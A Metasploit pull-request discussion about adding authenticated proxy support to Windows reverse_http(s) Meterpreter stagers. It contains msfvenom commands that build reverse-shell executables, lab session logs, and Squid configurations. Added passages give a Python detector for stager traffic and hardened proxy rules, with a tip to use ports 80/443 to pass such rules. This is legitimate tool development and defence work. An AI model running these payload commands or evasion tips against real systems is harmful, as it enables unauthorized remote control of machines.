Adds proxy (with authentication) support to reverse_http(s) #4934

Merged Mar 18, 2015 (6 commits)

Conversation

hdm (Contributor) commented Mar 16, 2015

This patch merges the functionality of reverse_https_proxy into the reverse_http and reverse_https stagers. These have been tested in all four configurations (http-noauth, https-noauth, http-auth, https-auth) on Windows 8.1 64-bit (WoW64) and Wine on Ubuntu 14.04 x86_64. Note that wine-1.6.4 does not set the user/pass parameters properly in SSL mode (the other cases work).

Test-wise, create four EXEs (http-noauth, https-noauth, http-auth, https-auth):

$ ./msfvenom -f exe -p windows/meterpreter/reverse_http LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 -o /scratch/windows_meterpreter_reverse_http_proxy_noauth.exe
$ ./msfvenom -f exe -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 -o /scratch/windows_meterpreter_reverse_https_proxy_noauth.exe
$ ./msfvenom -f exe -p windows/meterpreter/reverse_http LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 PayloadProxyUser=myproxyuser PayloadProxyPass=MyProxyPass -o /scratch/windows_meterpreter_reverse_http_proxy_auth.exe
$ ./msfvenom -f exe -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=4444 PayloadProxyHost=192.168.0.4 PayloadProxyPort=3128 PayloadProxyUser=myproxyuser PayloadProxyPass=MyProxyPass -o /scratch/windows_meterpreter_reverse_https_proxy_auth.exe

I used Squid on Ubuntu 14.04 with the following configuration in squid.conf (unauthenticated):

auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
http_access allow all

The following configuration was used in authenticated mode:

auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
acl password proxy_auth REQUIRED
auth_param basic children 5
auth_param basic realm TESTING
http_access allow password
http_access allow all

The passwd file was created with:

$ htpasswd -c /etc/squid3/passwd myproxyuser
MyProxyPass

Squid has to be restarted between configuration changes.

hdm added the payload label Mar 16, 2015

hdm (Contributor, Author) commented Mar 16, 2015

Commit f361e4e will be cleaned up once the existing proxy-aware stagers have been consolidated. For now, it supports both forms of proxy options, but prefers the new style when it's available.

hdm (Contributor, Author) commented Mar 16, 2015

For testing, note that the multi/handler settings for StageProxy{Host|Port|Type|User|Pass} should match the stager; however, disabling the proxy in the handler works just fine as long as the target has direct access back to the Metasploit listener. In this case 192.168.0.4 is both the proxy and the Metasploit listener, while 192.168.0.6 is the target. Note that the session IP pair is showing a connection between the listener and the proxy, not the target.

Testing windows_meterpreter_reverse_https_proxy_auth.exe on Windows 8.1:

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:51788 Request received for /OYX9m9X75ExXFH5rIb54OkX5HXDRaepda7foiyKUYYDZ4Y4bF4J3JakBywTVLLrPvMv3HIsAD7rzvdcScRvo6wLxG3o9k2vH97ofPrkkkULmhvR1cKGfbdEXj9wZfgrCUqNhKjT1q4A2YAnRIuy84JBNzc2EoABcKdSeRtE4pkvIWfWqIP1Rkj...
[*] 192.168.0.4:51788 Staging connection for target /OYX9m9X75ExXFH5rIb54OkX5HXDRaepda7foiyKUYYDZ4Y4bF4J3JakBywTVLLrPvMv3HIsAD7rzvdcScRvo6wLxG3o9k2vH97ofPrkkkULmhvR1cKGfbdEXj9wZfgrCUqNhKjT1q4A2YAnRIuy84JBNzc2EoABcKdSeRtE4pkvIWfWqIP1Rkj received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:51788) at 2015-03-16 00:21:42 -0500

meterpreter > sysinfo
Computer        : Z420
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

Corresponding squid log shows the metsrv.dll and stdapi downloads:

1426483301.738      0 192.168.0.6 TCP_DENIED/407 3565 CONNECT 192.168.0.4:4444 - HIER_NONE/- text/html
1426483302.167    429 192.168.0.6 TCP_MISS/200 773140 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.191      4 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.243     50 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.260      2 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.292      3 192.168.0.6 TCP_MISS/200 174850 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483302.296      2 192.168.0.6 TCP_MISS/200 278 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -

Testing windows_meterpreter_reverse_http_proxy_auth.exe on Windows 8.1:

[*] Started HTTP reverse handler on http://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.0.4:51949 Request received for /BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI...
[*] 192.168.0.4:51949 Staging connection for target /BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:51949) at 2015-03-16 00:27:55 -0500

meterpreter > sysinfo
Computer        : Z420
OS              : Windows 8 (Build 9200).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

Corresponding squid log shows the metsrv.dll and stdapi downloads:

1426483674.538      0 192.168.0.6 TCP_DENIED/407 4074 GET http://192.168.0.4:4444/BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI - HIER_NONE/- text/html
1426483675.026    487 192.168.0.6 TCP_MISS/200 770302 GET http://192.168.0.4:4444/BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZedeGyoz8dT7A49pvZs2qOjUMOQR31SVQCM1CpsLB4ZxprZ0OyS34MFj5np7pOEojskf3xttSVjF1NoJ2ypmygYI myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.046      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.093     46 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.108      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.141      2 192.168.0.6 TCP_MISS/200 174531 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.143      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream

The same tests work without authentication once the proxy has been reconfigured to allow it.

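The Squid excerpts above are also exactly what a defender sees on the proxy side: a 407 challenge, a retry carrying the proxy credentials, then either a CONNECT tunnel to a non-443 port (reverse_https) or a GET of a long opaque path answered with a large application/octet-stream body followed by a burst of small POSTs to a second opaque path (reverse_http). As an added example, not part of this PR or of Metasploit, the following Python parses Squid native-format access.log lines and flags those three patterns. The sample lines are constructed after the excerpts above (paths shortened, plus two benign lines for contrast); the thresholds (a path token of at least 16 characters, three POSTs within five seconds) and the function names are my assumptions and will need tuning on a real proxy.

```python
"""Heuristic detection of Metasploit reverse_http(s) staging in Squid access.log (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

# Squid "native" log format, one request per line:
#   timestamp elapsed client code/status bytes method url user hierarchy/peer content-type
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+"
    r"(?P<code>[A-Z_]+)/(?P<status>\d{3})\s+(?P<bytes>\d+)\s+(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+(?P<user>\S+)\s+(?P<hier>\S+)\s+(?P<ctype>\S+)\s*$"
)
# A URL path that is one long opaque token and nothing else (no extension, no query).
# The stager's first GET and the later POST path in the excerpt above both look like this.
TOKEN_RE = re.compile(r"^/[A-Za-z0-9_-]{16,}/?$")  # 16 is an assumed threshold


@dataclass
class Entry:
    ts: float
    client: str
    status: int
    nbytes: int
    method: str
    url: str
    user: str
    ctype: str


@dataclass
class Finding:
    client: str
    reason: str
    ts: float


def parse_line(line: str) -> Optional[Entry]:
    """Return an Entry for a native-format line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return Entry(float(m["ts"]), m["client"], int(m["status"]), int(m["bytes"]),
                 m["method"], m["url"], m["user"], m["ctype"])


def dest_port(e: Entry) -> Optional[int]:
    """Destination port: CONNECT logs host:port, other methods log a full URL."""
    if e.method == "CONNECT":
        _, _, port = e.url.rpartition(":")
        return int(port) if port.isdigit() else None
    u = urlsplit(e.url)
    if u.port:
        return u.port
    return {"http": 80, "https": 443}.get(u.scheme)


def analyze(lines: Iterable[str], connect_ok_ports=(443,),
            poll_window: float = 5.0, poll_min: int = 3) -> List[Finding]:
    """Flag the three stager patterns; returns findings in log order."""
    findings: List[Finding] = []
    posts: Dict[Tuple[str, str], List[float]] = defaultdict(list)
    for raw in lines:
        e = parse_line(raw)
        if e is None:
            continue  # unparseable line (other log format, truncation) is skipped
        # 1. Successful CONNECT tunnel to something other than 443. The 407 line that
        #    precedes it in the excerpt is the normal challenge; the 200 is the tunnel.
        if e.method == "CONNECT" and e.status == 200 and dest_port(e) not in connect_ok_ports:
            findings.append(Finding(e.client, f"CONNECT tunnel to non-TLS port {e.url}", e.ts))
            continue
        path = urlsplit(e.url).path
        # 2. Opaque-path GET answered with a binary body: the stage (metsrv.dll) download.
        if (e.method == "GET" and e.status == 200 and TOKEN_RE.match(path)
                and e.ctype == "application/octet-stream"):
            findings.append(Finding(e.client, f"opaque-path binary download ({e.nbytes} bytes) {e.url}", e.ts))
        # 3. Burst of POSTs to a second opaque path: the transport polling loop.
        if e.method == "POST" and TOKEN_RE.match(path):
            key = (e.client, e.url)
            recent = [t for t in posts[key] if e.ts - t <= poll_window] + [e.ts]
            posts[key] = recent
            if len(recent) == poll_min:
                findings.append(Finding(e.client, f"{poll_min} POSTs to opaque path within {poll_window}s: {e.url}", e.ts))
    return findings


# Constructed sample, modeled on the excerpts above (paths shortened) plus two benign lines.
SAMPLE_LOG = """\
1426483301.738      0 192.168.0.6 TCP_DENIED/407 3565 CONNECT 192.168.0.4:4444 - HIER_NONE/- text/html
1426483302.167    429 192.168.0.6 TCP_MISS/200 773140 CONNECT 192.168.0.4:4444 myproxyuser HIER_DIRECT/192.168.0.4 -
1426483674.538      0 192.168.0.6 TCP_DENIED/407 4074 GET http://192.168.0.4:4444/BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZ - HIER_NONE/- text/html
1426483675.026    487 192.168.0.6 TCP_MISS/200 770302 GET http://192.168.0.4:4444/BKuusNi15UOCbq8lS4MmSWfkskOslbeVVj6jKBnoBZ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.046      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.093     46 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483675.108      1 192.168.0.6 TCP_MISS/200 249 POST http://192.168.0.4:4444/0yjO_35Y6gBrfQ7ckkMxo/ myproxyuser HIER_DIRECT/192.168.0.4 application/octet-stream
1426483700.000    120 192.168.0.7 TCP_MISS/200 5120 GET http://www.example.com/index.html alice HIER_DIRECT/93.184.216.34 text/html
1426483701.000    300 192.168.0.7 TCP_MISS/200 8800 CONNECT www.example.com:443 alice HIER_DIRECT/93.184.216.34 -
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"{f.ts:.3f} {f.client}: {f.reason}")
```

The CONNECT rule is the robust one: a stock Squid only tunnels CONNECT to 443, so a reverse_https listener on 4444 either gets denied or stands out in the log. The opaque-path and POST-burst rules are heuristics that will also fire on some CDN and API traffic, and they stop working for an operator who picks LPORT=443 and a less random LURI, so treat them as hunting leads rather than alerts.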
bcook-r7 (Contributor) commented:

It's a little confusing, transitioning from PROXYHOST -> PROXY_HOST -> StagerProxyHost. Is this implying that there may be a different proxy host param for the payload?

hdm (Contributor, Author) commented Mar 16, 2015

The Stager prefix may need to be Payload instead, right now we have namespace conflicts between the exploit/auxiliary modules and the payload in some cases, which is why SSLCert became HandlerSSLCert. Would Payload make more sense? These would end up being shared with the payloads themselves (meterpreter etc).

jlee-r7 (Contributor) commented Mar 16, 2015

I think Payload makes more sense. Possibly even Payload:: since we have that sort of namespace for other things as well. PROXY_HOST has potential confusion with Proxies used for aggressive exploits.

hdm (Contributor, Author) commented Mar 16, 2015

Updated to PayloadProxy{Host|Port|Type|User|Pass}

Review comment on these lines of the diff:

# host: [hostname]
# port: [port]
# exitfunk: [process|thread|seh|sleep]
# ssl: (true|false)

A reviewer (Contributor) commented:

These should all be yard comments for the method, e.g.:

# @option opts [Bool] :ssl
# @option opts [String] :url

hdm pushed a commit to hdm/metasploit-framework that referenced this pull request Mar 16, 2015
Note that StagerRetryCount is not defined here, but will be in the parent class once rapid7#4934 lands
hdm (Contributor, Author) commented Mar 18, 2015

This needs a rebase once #4295 is landed

hdm (Contributor, Author) commented Mar 18, 2015

Squid configuration (/etc/squid3/squid.conf) on Ubuntu 14.04:

auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
acl localnet src 0.0.0.0/0
acl password proxy_auth REQUIRED
auth_param basic children 5
auth_param basic realm TESTING
http_access allow password
http_access allow all
http_access allow localnet
http_access deny all
http_port 3128
coredump_dir /var/spool/squid3
refresh_pattern ^ftp:       1440    20% 10080
refresh_pattern ^gopher:    1440    0%  1440
refresh_pattern -i (/cgi-bin/|\?) 0 0%  0
refresh_pattern (Release|Packages(.gz)*)$      0

To make this unauthenticated:

# auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
# acl password proxy_auth REQUIRED
# auth_param basic children 5
# auth_param basic realm TESTING
# http_access allow password
acl localnet src 0.0.0.0/0
http_access allow all
http_access allow localnet
http_access deny all
http_port 3128
coredump_dir /var/spool/squid3
refresh_pattern ^ftp:       1440    20% 10080
refresh_pattern ^gopher:    1440    0%  1440
refresh_pattern -i (/cgi-bin/|\?) 0 0%  0
refresh_pattern (Release|Packages(.gz)*)$      0

Create a user/pass with:

# htpasswd -c /etc/squid3/passwd myproxyuser
MyProxyPass

OJ (Contributor) commented Mar 18, 2015

@hmoore-r7 #4295 now landed. Over to you for fun rebasing shenanigans.

OJ assigned OJ and unassigned bcook-r7 Mar 18, 2015

OJ (Contributor) commented Mar 18, 2015

FWIW, this is my configuration that I used on Fedora 21 x64 (in case anyone else is interested)

auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
acl localnet src 0.0.0.0/0
acl password proxy_auth REQUIRED
auth_param basic children 5
auth_param basic realm MSF
http_access allow password
http_access allow all
http_access allow localnet
http_access deny all
http_port 3128
coredump_dir /tmp
refresh_pattern ^ftp:       1440    20% 10080
refresh_pattern ^gopher:    1440    0%  1440
refresh_pattern -i (/cgi-bin/|\?) 0 0%  0
#refresh_pattern (Release|Packages(.gz)*)$      0   <~ this causes failure for some reason

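Both lab configurations above grant `http_access allow all` from `acl localnet src 0.0.0.0/0`, which is what makes a CONNECT to port 4444 succeed; a stock squid.conf would not allow that. The following is an added example, not from this PR or from Squid's own documentation: a squid.conf that keeps the Basic authentication used above but otherwise applies the access rules a default Squid install ships with, so the stager is exercised against something closer to a corporate proxy. The client subnet 192.168.0.0/24 and the Squid 3 paths are assumed from the Ubuntu configuration above.

```conf
# Added example: authenticated lab proxy with stock Squid access rules (assumed subnet 192.168.0.0/24)
auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid3/passwd
auth_param basic children 5
auth_param basic realm TESTING
auth_param basic credentialsttl 2 hours
acl password proxy_auth REQUIRED

acl localnet src 192.168.0.0/24
acl SSL_ports port 443
acl Safe_ports port 80 443
acl CONNECT method CONNECT

# Same ordering as the default squid.conf: refuse CONNECT to anything but 443 and
# plain requests to anything but Safe_ports before any allow rule is consulted.
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
# Require both a local client and valid credentials; unauthenticated requests get a 407.
http_access allow localnet password
http_access deny all

http_port 3128
coredump_dir /var/spool/squid3
```

Against this configuration the reverse_https EXEs built above with LPORT=4444 never get a tunnel: the CONNECT is refused (TCP_DENIED/403 in access.log) before authentication is even evaluated, and reverse_http to port 4444 fails the Safe_ports check the same way. Rebuild the payloads with LPORT=443 (HTTPS) or LPORT=80 (HTTP) and matching handler ports to test the authenticated path under these rules; the `allow all` configurations above remain useful for isolating stager bugs from proxy policy.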
OJ (Contributor) commented Mar 18, 2015

Proxy host is 10.1.10.40, victim is 10.1.10.38

HTTP auth

msf exploit(handler) > run

[*] Started HTTP reverse handler on http://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43054 Request received for /JTkkGWEd33sqgK4NO5MbrgxPqe7Z5fM...
[*] 10.1.10.40:43054 Staging connection for target /JTkkGWEd33sqgK4NO5MbrgxPqe7Z5fM received...
[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43054) at 2015-03-18 17:19:56 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

HTTPS auth

msf exploit(handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43157 Request received for /nBgrQkJteYttu3jV7hHpfyZLrCcITWnu3Jxz1HjaJgm3pDM2gENfiOFWbQzGTW7QLuUWfiLART2XRdrVWhWYIx3O3dpWBJ5yMzpYw4dKPOejxwBhiBo7b99xknpN8KRPFo2LmlYpzRg83CnwUZ4L4nQ58Bh8nMkmC...
[*] 10.1.10.40:43157 Staging connection for target /nBgrQkJteYttu3jV7hHpfyZLrCcITWnu3Jxz1HjaJgm3pDM2gENfiOFWbQzGTW7QLuUWfiLART2XRdrVWhWYIx3O3dpWBJ5yMzpYw4dKPOejxwBhiBo7b99xknpN8KRPFo2LmlYpzRg83CnwUZ4L4nQ58Bh8nMkmC received...
[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43157) at 2015-03-18 17:22:52 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

HTTPS noauth

msf exploit(handler) > run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43240 Request received for /ruLwrmOkdaxWJ5f9oo5HP15IGS224u6n03QXNVE9UAKWwGjbiSf8K966FAK1E0s0Qr0cqngaw0xg6xwtq9IQReSuy4RbNTKUFHLMW4nfxIrqH0WjiLVAHpkjTFaQXbrrDSWDChl9qLuX54N2b8u7Be8t7...
[*] 10.1.10.40:43240 Staging connection for target /ruLwrmOkdaxWJ5f9oo5HP15IGS224u6n03QXNVE9UAKWwGjbiSf8K966FAK1E0s0Qr0cqngaw0xg6xwtq9IQReSuy4RbNTKUFHLMW4nfxIrqH0WjiLVAHpkjTFaQXbrrDSWDChl9qLuX54N2b8u7Be8t7 received...
[*] Meterpreter session 2 opened (10.1.10.33:8000 -> 10.1.10.40:43240) at 2015-03-18 17:24:54 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 2 closed.  Reason: User exit

HTTP noauth

msf exploit(handler) > run

[*] Started HTTP reverse handler on http://0.0.0.0:8000/
[*] Starting the payload handler...
[*] 10.1.10.40:43312 Request received for /inJ1IBNBbtefevix4vOSNrfcrysM2ybSN3kER4V1aEqNO2a6HQBc8rwNiWTG8PaUX35Kb98Ilz9YSuTxyMHPnpGnrVGOxEMC0gcZqvuUViK6taMV6OdHXv3Iu5...
[*] 10.1.10.40:43312 Staging connection for target /inJ1IBNBbtefevix4vOSNrfcrysM2ybSN3kER4V1aEqNO2a6HQBc8rwNiWTG8PaUX35Kb98Ilz9YSuTxyMHPnpGnrVGOxEMC0gcZqvuUViK6taMV6OdHXv3Iu5 received...
[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43312) at 2015-03-18 17:26:14 +1000

meterpreter > getuid
Server username: CORELAN\oj
meterpreter > sysinfo
Computer        : CORELAN
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_AU
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

Looks good!

OJ (Contributor) commented Mar 18, 2015

Had a fiddle with each for general usage and didn't see any issues. The initial connection comes from the proxy (10.1.10.40):

[*] Meterpreter session 1 opened (10.1.10.33:8000 -> 10.1.10.40:43312) at 2015-03-18 17:26:14 +1000

But MSF sees the IP behind the scenes correctly:

[*] 10.1.10.38 - Meterpreter session 1 closed.  Reason: User exit

Nice work @hmoore-r7. Landing now.

OJ merged commit b62da42 into rapid7:master Mar 18, 2015
OJ added a commit that referenced this pull request Mar 18, 2015
techpeace pushed a commit to techpeace/metasploit-framework that referenced this pull request Mar 19, 2015
Squashed commit of the following:

commit 1dcad7c
Merge: 1a2f35d 35d29f5
Author: OJ <oj@buffered.io>
Date:   Thu Mar 19 14:43:27 2015 +1000

    Land rapid7#4953 : Updated POSIX meterpreter binaries

commit 35d29f5
Author: Brent Cook <bcook@rapid7.com>
Date:   Wed Mar 18 22:57:03 2015 -0500

    update linux meterpreter bins

commit 1a2f35d
Merge: 076f15f 346b1d5
Author: OJ <oj@buffered.io>
Date:   Thu Mar 19 12:41:20 2015 +1000

    Land rapid7#4951: Dynamic URI generation for Java/Python reverse_http(s)

commit 076f15f
Merge: b33e7f4 3f8ed56
Author: Spencer McIntyre <zeroSteiner@gmail.com>
Date:   Wed Mar 18 20:59:54 2015 -0400

    Land rapid7#4792 @jakxx Publish It PUI file exploit

commit 3f8ed56
Author: Spencer McIntyre <zeroSteiner@gmail.com>
Date:   Wed Mar 18 20:57:58 2015 -0400

    Add available space to the payload info

commit b33e7f4
Merge: 0d1f205 5dd718e
Author: joev <joev@metasploit.com>
Date:   Wed Mar 18 17:17:34 2015 -0500

    Land rapid7#4947, h0ng10's TWiki exploit.

commit 346b1d5
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 16:24:01 2015 -0500

    Revert Java back to static size for cache purposes (less cpu usage on startup)

commit 33bbf7c
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 16:08:11 2015 -0500

    Dynamic URI generation for python/java http(s) stagers

commit 0d1f205
Merge: e943cb5 dab4333
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 15:31:22 2015 -0500

    Lands rapid7#4949 which fixes rapid7#4845

commit dab4333
Author: rwhitcroft <rw81junk@gmail.com>
Date:   Wed Mar 18 16:07:46 2015 -0400

    updated asm in block

commit 7ae9739
Author: rwhitcroft <rw81junk@gmail.com>
Date:   Wed Mar 18 15:34:31 2015 -0400

    fix x64/reverse_https stager shellcode

commit e943cb5
Merge: d152c41 d1a2f58
Author: OJ <oj@buffered.io>
Date:   Wed Mar 18 22:34:52 2015 +1000

    Land rapid7#4585 : CVE-2015-0975 XXE in OpenNMS

commit d1a2f58
Author: OJ <oj@buffered.io>
Date:   Wed Mar 18 22:17:44 2015 +1000

    Fix of regex for file capture and format tweaks

commit 5dd718e
Author: Hans-Martin Münch (h0ng10) <muench@mogwaisecurity.de>
Date:   Wed Mar 18 09:51:51 2015 +0100

    Better description

commit 00de437
Author: Hans-Martin Münch (h0ng10) <muench@mogwaisecurity.de>
Date:   Wed Mar 18 09:45:08 2015 +0100

    Initial commit

commit fa72423
Author: OJ <oj@buffered.io>
Date:   Wed Mar 18 18:18:54 2015 +1000

    Move the module to the correct location

commit d152c41
Merge: b46e5f8 b62da42
Author: OJ <oj@buffered.io>
Date:   Wed Mar 18 17:42:19 2015 +1000

    Land rapid7#4934 : Proxy and auth support in reverse_http(s)

commit b62da42
Merge: c607cf7 b46e5f8
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:51:15 2015 -0500

    Merge branch 'master' into feature/add-proxies-to-wininet

commit b46e5f8
Merge: bd4738b 97def50
Author: OJ <oj@buffered.io>
Date:   Wed Mar 18 16:49:13 2015 +1000

    Land rapid7#4295 : Refactor proxy-enabled payload handling

commit c607cf7
Merge: 0513852 bd4738b
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:45:44 2015 -0500

    Merging master

commit 97def50
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:26:59 2015 -0500

    Whitespace cleanup

commit 8d3cb8b
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:25:42 2015 -0500

    Fix up meterpreter patching arguments and names

commit ef443c8
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:21:53 2015 -0500

    Fix overgreedy search/replace

commit 390a704
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:19:05 2015 -0500

    Cleanup proxyhost/proxyport arguments to match new names

commit f7a06d8
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:15:32 2015 -0500

    Rework PROXY_{HOST|PORT|TYPE|USERNAME|PASSWORD} to the new syntax

commit 3aa8cb6
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:08:09 2015 -0500

    Fix two use cases of PROXYHOST/PROXYPORT

commit 87a4899
Author: HD Moore <hd_moore@rapid7.com>
Date:   Mon Dec 15 14:48:09 2014 -0600

    Place an IPv6 proxy IP between brackets

commit 259db26
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Dec 2 15:36:14 2014 -0600

    Remove user/pass and invalid class from the options

commit 2ab14e7
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 01:01:10 2015 -0500

    Adds IPv6 and option-related issues with the previous patch

commit 0601946
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Dec 2 13:29:39 2014 -0600

    Don't mandate and default PROXY_HOST (miscopy from the proxy stager)

commit a4df6d5
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 00:59:59 2015 -0500

    Cleanup proxy handling code (consistency & bugs)

    One subtle bug was that each time a request was received, a null byte was being appended to the datastore options for PROXY_USERNAME and PROXY_PASSWORD. Eventually this would break new sessions. This change centralizes the proxy configuration and cleans up the logic.

commit 85fb534
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Dec 2 12:57:30 2014 -0600

    Fix up the offset detection again, cleanup redundant code

commit 2f13988
Author: HD Moore <hd_moore@rapid7.com>
Date:   Tue Dec 2 12:33:53 2014 -0600

    Use OptPort vs OptInt and cleanup the description

commit a01be36
Author: HD Moore <hd_moore@rapid7.com>
Date:   Wed Mar 18 00:59:13 2015 -0500

    Rework PROXYHOST/PROXYPORT to PROXY_HOST/PROXY_PORT

    This also cleans up the windows reverse_https_proxy stager.

commit b197b7a
Author: jakxx <jakx.ppr@gmail.com>
Date:   Tue Mar 17 19:24:13 2015 -0400

    Additional Updates

    -Removed unused mixin
    -Cleaned up Module name
    -Cleaned up author name

commit bd4738b
Merge: 47a7f99 d7fa0ec
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 17 17:37:55 2015 -0500

    Land rapid7#4827, capture and nbns fixups

commit d7fa0ec
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 17 17:36:45 2015 -0500

    Let IPAddr#hton do the calculating

commit 47a7f99
Merge: d1d6378 5fd3637
Author: Brent Cook <bcook@rapid7.com>
Date:   Tue Mar 17 16:22:46 2015 -0500

